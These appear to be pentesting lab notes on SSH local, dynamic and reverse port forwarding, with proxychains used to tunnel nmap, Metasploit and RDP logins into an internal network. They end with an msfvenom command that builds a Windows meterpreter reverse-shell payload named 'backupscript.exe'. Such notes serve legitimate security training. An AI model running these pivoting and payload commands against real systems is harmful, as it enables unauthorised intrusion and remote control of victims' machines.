Port Forwarding SSH

Dynamic Port Forwarding with SSH and SOCKS Tunneling

Local Port Forward

$ ssh -L 1234:localhost:3306 ubuntu@10.129.202.64

Confirming Port Forward with Netstat

$ netstat -antp | grep 1234

Forwarding Multiple Ports

$ ssh -L 1234:localhost:3306 -L 8080:localhost:80 ubuntu@10.129.202.64

Enabling Dynamic Port Forwarding with SSH

$ ssh -D 9050 ubuntu@10.129.202.64

config /etc/proxychains.conf

cat /etc/proxychains.conf

# meanwile
# defaults set to "tor"
socks4 	127.0.0.1 9050

Nmap with Proxychains

proxychains nmap -v -sn 172.16.5.1-200

Metasploit with Proxychains

proxychains msfconsole

Using rdp_scanner Module

msf6 > search rdp_scanner

Using xfreerdp with Proxychains

proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123

Reverse Port Forwarding with SSH

Creating a Windows Payload with msfvenom

msfvenom -p windows/x64/meterpreter/reverse_https lhost= <InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8080

ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN